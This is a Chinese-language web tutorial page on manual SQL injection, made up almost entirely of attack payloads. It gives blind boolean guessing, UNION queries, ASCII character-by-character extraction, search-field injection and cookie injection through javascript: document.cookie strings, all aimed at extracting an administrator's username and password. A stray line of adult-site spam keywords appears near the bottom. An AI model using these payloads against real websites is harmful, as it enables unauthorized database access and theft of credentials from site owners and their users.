請登錄后使用快捷導航
沒有帳號？立即注冊

手工注入猜解語句教程

2022-9-24 12:59| 查看: 2200 |來源: 互聯網

猜解表名： and exists (select * from 表名) 猜解列名： and exists (select 字段 from 表名) UNION法：聯合查詢： select name,password,id from user union select user,pwd,uid from 爆指定表名內容：

猜解表名：
and exists (select * from 表名)
猜解列名：
and exists (select 字段 from 表名)
UNION法：
聯合查詢：
select name,password,id from user union select user,pwd,uid from
爆指定表名內容：
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解碼法：
1、猜解列長度
猜解語句：
and (select top 1 len(列名)from 表名)>N
and (select top 1 len(列名)from 表名)=N
其中N是數字，變換這個N的值猜解列長度，例如：
and (select top 1 len(列名)from 表名)>1
and (select top 1 len(列名)from 表名)>6
如果一直猜到6都顯示正常頁面，猜到7的時候返回錯誤（大于6并且小于等于7），那么該列的長度為7。因為“top 1”的意思是把最靠前的1條記錄給提取出來，所以如果要猜解第二條記錄就該使用：
select top 1 len(列名) from 表名
where 列名 not in (select top 1 列名 from 表名)
2、ASCII碼分析法猜解用戶和密碼
ASC()函數和Mid函數
例如：mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII碼
猜解語句為：
and (select top 1 asc(mid(字段,1,1)) from 數據庫名)=ASC碼(通過轉換工具換)
區間判斷語句：
“......between......and......”
中文處理法:
當ASCII轉換后為“負數”使用abs()函數取絕對值。
例：and (select top 1 abs(asc(mid(字段,1,1))) from 數據庫名)=ASC碼(通過轉換工具換)
ASCII逐字解碼法的應用：
1、猜解表名：
and (select count(*) from admin)<>0
2、猜解列名：
and (select count(列名) from 表名)<>0
3、猜解管理員用戶個數：
and (select count(*) from 表名)=1
返回正常，表中有一條記錄。
4、猜解管理員用戶名的長度：
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理員用戶名：
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交：
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理員的密碼：
按照上面的原理，只要把上面的語句中(asc(mid(列名,1,1)的列名換成PASSWORD就能得到管理員的密碼了。
搜索型注入漏洞利用猜解語句：
關鍵字%' and 1=1 and '%'='%
關鍵字%' and 1=2 and '%'='%
將and 1=1 換成注入語句就可以了。

cookie注入語句:
javascript:alert(document.cookie="id=" escape("44 and 1=1"));
javascript:alert(document.cookie="id=" escape("44 and 1=2"));
猜解語句:
猜解長度:
javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16"))
猜解內容:
javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97"))

本文最后更新于 2022-9-24 12:59，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：[email protected]

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：掃不出肉雞的常見原因一般都有哪些？上一篇：看黑客怎樣匯編創建簡單的窗口

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

手工注入猜解語句教程

大家都在看

相關分類

熱門排行

最近更新